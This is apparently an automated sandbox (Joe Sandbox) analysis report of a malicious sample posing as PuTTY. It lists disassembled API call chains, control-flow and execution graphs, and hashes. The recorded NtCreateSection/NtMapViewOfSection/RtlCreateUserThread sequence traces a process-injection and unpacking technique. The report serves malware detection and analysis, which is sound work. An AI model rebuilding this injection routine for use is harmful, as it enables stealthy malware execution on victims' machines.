                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                      • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                                                                                                      • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                      • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 583 4018a9-4018c1 590 4018d2 583->590 591 4018c9-4018f7 call 40113b Sleep call 4013bf 583->591 590->591 597 401906-40194c call 40113b 591->597 598 4018f9-401901 call 4014b5 591->598 598->597
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                      • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                                                                                                      • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                      • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                      • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                                                                                                      • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                      • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                      • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                                                                                                      • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                      • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005419D0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_530000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                      • Instruction ID: 995cba72c42569d995567d0f688205392ed3a7af4c51bcef391cae3ba8d7b1de
                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                      • Instruction Fuzzy Hash: 18113C79A40208EFDB01DF98C985E98BFF5AF08351F158094F9889B362D371EA90DF84
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                      • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                                                                                                      • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                      • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_5f0000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                      • API String ID: 0-2784972518
                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                      • Instruction ID: b437e55aa1150b7aa29c0e0734b87b9c3710736e4c8244c2eae4c773cf33aefc
                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                      • Instruction Fuzzy Hash: E931AEB2900209CFDB10CF88C980AAEBBF5FF48324F18504AD541A7352D3B5EA45CFA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_530000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                      • Instruction ID: ba3bb6136c8dacd767448c19b0336dc6ab0f791354aa626db360880a9d602d49
                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                      • Instruction Fuzzy Hash: FA11AC72340500AFDB00CF55DC81EE277EAFB89324B298065E909CB302E676EC82CB64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                                                                                                      • Instruction ID: b4d99e39562e0a8d34f4e8a2adcb899dff0217260de8cdfa4497104cdd6e8b78
                                                                                                                      • Opcode Fuzzy Hash: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                                                                                                      • Instruction Fuzzy Hash: 7A117A22B1C21196E3179A918A460A97710DB11360B74C87BD493BB8F3C27D98066BCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                                                                                                      • Instruction ID: 9c1a6264578523f2b95dbae5c8345fb03cc7a3f7f5b051fb9d7a91e089220ce3
                                                                                                                      • Opcode Fuzzy Hash: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                                                                                                      • Instruction Fuzzy Hash: 06118C27A1C20096E3179A90C6461A5B760DB12360B74887BD493778F3D17D58065BCF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                                                                                                      • Instruction ID: 7cced9f7fdb1c3f7b009c6269bf5343d8ea2104f00e9896e504acad3335f8aa1
                                                                                                                      • Opcode Fuzzy Hash: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                                                                                                      • Instruction Fuzzy Hash: 1811AB23F1C20056E3179F91C6460A8B760DB12360B748C7FD4826B8F7D27D98129BCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                                                                                                      • Instruction ID: 5938fd262c6d7fd7e9059b2c6d5fc66a7b7b37341f859f3ef56555a79cfd23f8
                                                                                                                      • Opcode Fuzzy Hash: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                                                                                                      • Instruction Fuzzy Hash: 0401AB33F1C20056E3179AA0C6860A9B760DB12360B74887BD482678F3D23D98025BCF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                                                                                                      • Instruction ID: 34643119912da5106e2d45a94dd8d32290489c90b68d507143b233416c26121d
                                                                                                                      • Opcode Fuzzy Hash: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                                                                                                      • Instruction Fuzzy Hash: A101BD23F2821055D71B9BA0C6860E8BB20DA12360B7489BBD052778F3D23C94028BCD
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSection
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3132048701-0
                                                                                                                      • Opcode ID: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                                                                                                      • Instruction ID: 94d0d6187efa1b4f5fb96639de9bee4adb18fcc7c1e699108f742e7c63bf3b1b
                                                                                                                      • Opcode Fuzzy Hash: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                                                                                                      • Instruction Fuzzy Hash: FF019953F2D64126D72B9FA086460D9BB20E9133B07748DBFD4A267CF7C274941487C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_5f0000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                      • Instruction ID: 863051e66c8a79b30188aad475c6f9cf6a4493174bac05a33afdcecc6e0a7bcc
                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                      • Instruction Fuzzy Hash: C801F7726016088FDF21DF60C804BBB37E9FB85306F0944A4DB06D72C3E378A8418B80
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635603623.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_40b000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction ID: e950241f73d42944cd710210a14d6297da0e762eb9f253b78aae5045d500f0ca
                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction Fuzzy Hash: 5511723210014ABBCF229E84CC418EE3F26BB58354B188436FE1864971D33AC9B5AF85

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:6.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:80.9%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:162
                                                                                                                      Total number of Limit Nodes:6
                                                                                                                      execution_graph 7556 4013ca 7557 4013d0 7556->7557 7558 401564 NtDuplicateObject 7557->7558 7562 401478 7557->7562 7559 401581 NtCreateSection 7558->7559 7558->7562 7560 401601 NtCreateSection 7559->7560 7561 4015a7 NtMapViewOfSection 7559->7561 7560->7562 7564 40162d 7560->7564 7561->7560 7563 4015ca NtMapViewOfSection 7561->7563 7563->7560 7565 4015e8 7563->7565 7564->7562 7566 401637 NtMapViewOfSection 7564->7566 7565->7560 7566->7562 7567 40165e NtMapViewOfSection 7566->7567 7567->7562 7405 402f8f 7406 4030d2 7405->7406 7407 402fb9 7405->7407 7407->7406 7408 403074 RtlCreateUserThread NtTerminateProcess 7407->7408 7408->7406 7478 40148f 7479 401414 7478->7479 7489 401478 7478->7489 7480 401564 NtDuplicateObject 7479->7480 7479->7489 7481 401581 NtCreateSection 7480->7481 7480->7489 7482 401601 NtCreateSection 7481->7482 7483 4015a7 NtMapViewOfSection 7481->7483 7485 40162d 7482->7485 7482->7489 7483->7482 7484 4015ca NtMapViewOfSection 7483->7484 7484->7482 7486 4015e8 7484->7486 7487 401637 NtMapViewOfSection 7485->7487 7485->7489 7486->7482 7488 40165e NtMapViewOfSection 7487->7488 7487->7489 7488->7489 7312 402e51 7314 402e44 7312->7314 7315 402ef2 7314->7315 7316 401891 7314->7316 7317 4018a1 7316->7317 7318 4018da Sleep 7317->7318 7323 4013bf 7318->7323 7320 4018f5 7322 401906 7320->7322 7335 4014b5 7320->7335 7322->7315 7324 4013d0 7323->7324 7325 401564 NtDuplicateObject 7324->7325 7331 401478 7324->7331 7326 401581 NtCreateSection 7325->7326 7325->7331 7327 401601 NtCreateSection 7326->7327 7328 4015a7 NtMapViewOfSection 7326->7328 7330 40162d 7327->7330 7327->7331 7328->7327 7329 4015ca NtMapViewOfSection 7328->7329 7329->7327 7332 4015e8 7329->7332 7330->7331 7333 401637 NtMapViewOfSection 7330->7333 7331->7320 7332->7327 7333->7331 7334 40165e NtMapViewOfSection 7333->7334 7334->7331 7336 4014c6 7335->7336 7337 401564 NtDuplicateObject 7336->7337 7343 401680 7336->7343 7338 401581 NtCreateSection 7337->7338 7337->7343 7339 401601 NtCreateSection 7338->7339 7340 4015a7 NtMapViewOfSection 7338->7340 7342 40162d 7339->7342 7339->7343 7340->7339 7341 4015ca NtMapViewOfSection 7340->7341 7341->7339 7344 4015e8 7341->7344 7342->7343 7345 401637 NtMapViewOfSection 7342->7345 7343->7322 7344->7339 7345->7343 7346 40165e NtMapViewOfSection 7345->7346 7346->7343 7454 4014d3 7455 4014d8 7454->7455 7456 401564 NtDuplicateObject 7455->7456 7462 401680 7455->7462 7457 401581 NtCreateSection 7456->7457 7456->7462 7458 401601 NtCreateSection 7457->7458 7459 4015a7 NtMapViewOfSection 7457->7459 7461 40162d 7458->7461 7458->7462 7459->7458 7460 4015ca NtMapViewOfSection 7459->7460 7460->7458 7465 4015e8 7460->7465 7461->7462 7463 401637 NtMapViewOfSection 7461->7463 7463->7462 7464 40165e NtMapViewOfSection 7463->7464 7464->7462 7465->7458 7421 5b0001 7422 5b0005 7421->7422 7427 5b092b GetPEB 7422->7427 7424 5b0030 7429 5b003c 7424->7429 7428 5b0972 7427->7428 7428->7424 7430 5b0049 7429->7430 7431 5b0e0f 2 API calls 7430->7431 7432 5b0223 7431->7432 7433 5b0d90 GetPEB 7432->7433 7434 5b0238 VirtualAlloc 7433->7434 7435 5b0265 7434->7435 7436 5b02ce VirtualProtect 7435->7436 7438 5b030b 7436->7438 7437 5b0439 VirtualFree 7441 5b04be LoadLibraryA 7437->7441 7438->7437 7440 5b08c7 7441->7440 7490 40189c 7491 4018ae 7490->7491 7492 4018da Sleep 7491->7492 7493 4013bf 7 API calls 7492->7493 7494 4018f5 7493->7494 7495 4014b5 7 API calls 7494->7495 7496 401906 7494->7496 7495->7496 7442 5b0005 7443 5b092b GetPEB 7442->7443 7444 5b0030 7443->7444 7445 5b003c 7 API calls 7444->7445 7446 5b0038 7445->7446 7362 40bc65 7365 40baca 7362->7365 7364 40bc74 7366 40bad6 getSystemCP __setmbcp __malloc_crt 7365->7366 7368 40bb2d __setmbcp 7366->7368 7369 40b8e5 7366->7369 7368->7364 7372 40b905 getSystemCP __setmbcp_nolock 7369->7372 7370 40b910 setSBCS 7370->7368 7372->7370 7373 40b632 7372->7373 7374 40b659 ___crtGetStringTypeA 7373->7374 7378 40b718 7374->7378 7379 40ff63 7374->7379 7377 40ff63 ___crtLCMapStringA LCMapStringW 7377->7378 7378->7372 7380 40ff76 7379->7380 7383 40fbbe 7380->7383 7382 40b6f3 7382->7377 7384 40fbdf LCMapStringW 7383->7384 7385 40fbfa __freea ___convertcp ___ansicp 7383->7385 7384->7385 7385->7382 7386 5b003c 7387 5b0049 7386->7387 7399 5b0e0f SetErrorMode SetErrorMode 7387->7399 7392 5b0265 7393 5b02ce VirtualProtect 7392->7393 7395 5b030b 7393->7395 7394 5b0439 VirtualFree 7398 5b04be LoadLibraryA 7394->7398 7395->7394 7397 5b08c7 7398->7397 7400 5b0223 7399->7400 7401 5b0d90 7400->7401 7402 5b0dad 7401->7402 7403 5b0dbb GetPEB 7402->7403 7404 5b0238 VirtualAlloc 7402->7404 7403->7404 7404->7392 7523 402d2c 7525 402d35 7523->7525 7524 402ef2 7525->7524 7526 401891 15 API calls 7525->7526 7526->7524 7347 541520 7348 54152f 7347->7348 7351 541cc0 7348->7351 7352 541cdb 7351->7352 7353 541ce4 CreateToolhelp32Snapshot 7352->7353 7354 541d00 Module32First 7352->7354 7353->7352 7353->7354 7355 541d0f 7354->7355 7357 541538 7354->7357 7358 54197f 7355->7358 7359 5419aa 7358->7359 7360 5419f3 7359->7360 7361 5419bb VirtualAlloc 7359->7361 7360->7360 7361->7360 7527 40f1bd 7530 40f031 7527->7530 7531 40f045 7530->7531 7536 410b52 7531->7536 7533 40f051 __forcdecpt_l 7534 410b52 __forcdecpt_l LCMapStringW 7533->7534 7535 40f06e 7534->7535 7537 410b70 7536->7537 7538 410b60 7536->7538 7540 410a3d 7537->7540 7538->7533 7542 410a52 __isleadbyte_l 7540->7542 7541 410a5e __isctype_l 7541->7538 7542->7541 7543 40ff63 ___crtLCMapStringA LCMapStringW 7542->7543 7543->7541

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 85 4013bf-4013c8 86 4013d0-4013d6 85->86 87 4013da 85->87 88 4013dd-401422 call 40113b 86->88 87->86 87->88 98 401424-401440 88->98 99 401496-40149e 88->99 101 401442 98->101 102 4014b7-4014d5 98->102 100 4014a0-4014b2 99->100 104 401492-401494 101->104 105 401444-401446 101->105 106 4014c6-4014e9 102->106 105->100 107 401448-401461 105->107 113 4014e0 106->113 110 401463-401468 107->110 111 4014c4 107->111 114 4014e5-4014f8 110->114 115 40146a 110->115 111->106 113->114 122 4014f1-4014f4 114->122 123 4014fb-40150e call 40113b 114->123 116 40146c-401476 115->116 117 4014de 115->117 120 401414-401422 116->120 121 401478-40147c 116->121 117->113 120->98 120->99 122->123 126 401510 123->126 127 401513-401518 123->127 126->127 129 40183d-401845 127->129 130 40151e-40152f 127->130 129->127 135 40184a 129->135 133 401535-40155e 130->133 134 40183b 130->134 133->134 143 401564-40157b NtDuplicateObject 133->143 134->135 136 401861 135->136 137 401852-40185d 135->137 136->137 138 401864-40188e call 40113b 136->138 137->138 143->134 145 401581-4015a5 NtCreateSection 143->145 148 401601-401627 NtCreateSection 145->148 149 4015a7-4015c8 NtMapViewOfSection 145->149 148->134 152 40162d-401631 148->152 149->148 151 4015ca-4015e6 NtMapViewOfSection 149->151 151->148 154 4015e8-4015fe 151->154 152->134 155 401637-401658 NtMapViewOfSection 152->155 154->148 155->134 157 40165e-40167a NtMapViewOfSection 155->157 157->134 159 401680 call 401685 157->159
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                      • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                                                                                                      • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                      • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 161 4014b5-4014f8 170 4014f1-4014f4 161->170 171 4014fb-40150e call 40113b 161->171 170->171 174 401510 171->174 175 401513-401518 171->175 174->175 177 40183d-401845 175->177 178 40151e-40152f 175->178 177->175 183 40184a 177->183 181 401535-40155e 178->181 182 40183b 178->182 181->182 191 401564-40157b NtDuplicateObject 181->191 182->183 184 401861 183->184 185 401852-40185d 183->185 184->185 186 401864-40188e call 40113b 184->186 185->186 191->182 193 401581-4015a5 NtCreateSection 191->193 196 401601-401627 NtCreateSection 193->196 197 4015a7-4015c8 NtMapViewOfSection 193->197 196->182 200 40162d-401631 196->200 197->196 199 4015ca-4015e6 NtMapViewOfSection 197->199 199->196 202 4015e8-4015fe 199->202 200->182 203 401637-401658 NtMapViewOfSection 200->203 202->196 203->182 205 40165e-40167a NtMapViewOfSection 203->205 205->182 207 401680 call 401685 205->207
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1546783058-0
                                                                                                                      • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                      • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                                                                                                      • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                      • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
